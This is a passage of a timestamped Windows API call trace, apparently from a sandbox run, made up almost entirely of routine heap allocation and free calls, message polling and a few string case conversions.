Flags=0x0, Size=0x4) returned 0x2a71338 [0085.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed210 | out: hHeap=0x2af0000) returned 1 [0085.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71338 | out: hHeap=0x2af0000) returned 1 [0085.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed210 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee110 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71318 [0085.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee110 | out: hHeap=0x2af0000) returned 1 [0085.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71318 | out: hHeap=0x2af0000) returned 1 [0085.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed210 | out: hHeap=0x2af0000) returned 1 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed210 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee110 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71398 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee110 | out: hHeap=0x2af0000) returned 1 [0085.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee110 [0085.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0085.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0085.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711a8 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71258 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71268 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a790b0 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712f8 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a98 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64870 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64930 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a68 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64888 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64810 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a80 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64960 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647b0 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649a8 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a08 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647c8 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a20 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a38 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63c40 | out: hHeap=0x2af0000) returned 1 [0085.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a50 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64108 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64120 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64750 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71278 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647f8 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64828 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648b8 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69bb0 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648a0 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648d0 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63d48 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71358 | out: hHeap=0x2af0000) returned 1 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0085.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0085.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712c8 [0085.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712a8 [0085.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712f8 [0085.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0085.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711c8 [0085.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0085.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0085.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71288 [0085.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee698 [0085.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71288 | out: hHeap=0x2af0000) returned 1 [0085.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee698 | out: hHeap=0x2af0000) returned 1 [0085.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0085.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0085.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712f8 | out: hHeap=0x2af0000) returned 1 [0085.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0085.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712a8 | out: hHeap=0x2af0000) returned 1 [0085.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0085.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0085.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711f8 [0085.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0085.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0085.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711c8 [0085.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee698 [0085.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee698 | out: hHeap=0x2af0000) returned 1 [0085.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0085.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0085.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711f8 | out: hHeap=0x2af0000) returned 1 [0085.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646c0 | out: hHeap=0x2af0000) returned 1 [0085.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0085.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645e8 | out: hHeap=0x2af0000) returned 1 [0085.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0085.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730b8 [0085.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0085.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0085.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71318 [0085.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee698 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71318 | out: hHeap=0x2af0000) returned 1 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee698 | out: hHeap=0x2af0000) returned 1 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730b8 | out: hHeap=0x2af0000) returned 1 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64600 | out: hHeap=0x2af0000) returned 1 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71228 | out: hHeap=0x2af0000) returned 1 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649c0 | out: hHeap=0x2af0000) returned 1 [0085.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71248 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0085.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712f8 [0085.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71258 [0085.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0085.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0085.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0085.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711e8 [0085.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee698 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee698 | out: hHeap=0x2af0000) returned 1 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71258 | out: hHeap=0x2af0000) returned 1 [0085.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712f8 | out: hHeap=0x2af0000) returned 1 [0085.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0085.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ee698 [0085.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ee668 [0085.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29eef38 [0085.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef220 [0085.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29efaf0 [0085.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a790b0 [0085.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0085.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ee398 [0085.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29eff88 [0085.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29f0510 [0085.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0798 [0085.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29f0a08 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0085.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a790b0 | out: hHeap=0x2af0000) returned 1 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29f0e70 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1008 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29f1038 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29f1398 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1548 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64a98 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64a38 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a08 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a647b0 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64930 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647c8 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a649a8 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712a8 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a790b0 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71258 [0085.653] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0085.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a790b0 | out: hHeap=0x2af0000) returned 1 [0085.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71258 | out: hHeap=0x2af0000) returned 1 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64960 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e90 [0085.653] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711c8 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712c8 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648b8 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a50 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71248 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64828 [0085.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71268 [0085.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a790b0 [0085.654] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a790b0 | out: hHeap=0x2af0000) returned 1 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71268 | out: hHeap=0x2af0000) returned 1 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64828 | out: hHeap=0x2af0000) returned 1 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a50 | out: hHeap=0x2af0000) returned 1 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648b8 | out: hHeap=0x2af0000) returned 1 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0085.654] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0085.654] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0085.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711a8 [0085.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71208 [0085.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a20 [0085.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647f8 [0085.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71268 [0085.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a649c0 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71268 | out: hHeap=0x2af0000) returned 1 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649c0 | out: hHeap=0x2af0000) returned 1 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647f8 | out: hHeap=0x2af0000) returned 1 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a20 | out: hHeap=0x2af0000) returned 1 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71208 | out: hHeap=0x2af0000) returned 1 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e90 | out: hHeap=0x2af0000) returned 1 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64960 | out: hHeap=0x2af0000) returned 1 [0085.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712a8 | out: hHeap=0x2af0000) returned 1 [0085.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64870 [0085.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712f8 [0085.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64888 [0085.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712f8 | out: hHeap=0x2af0000) returned 1 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64960 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711e8 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647f8 [0085.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a50 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711e8 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648a0 [0085.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a790b0 [0085.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647c8 | out: hHeap=0x2af0000) returned 1 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a20 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71268 [0085.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71268 | out: hHeap=0x2af0000) returned 1 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712a8 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a649c0 [0085.655] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a68 [0085.655] 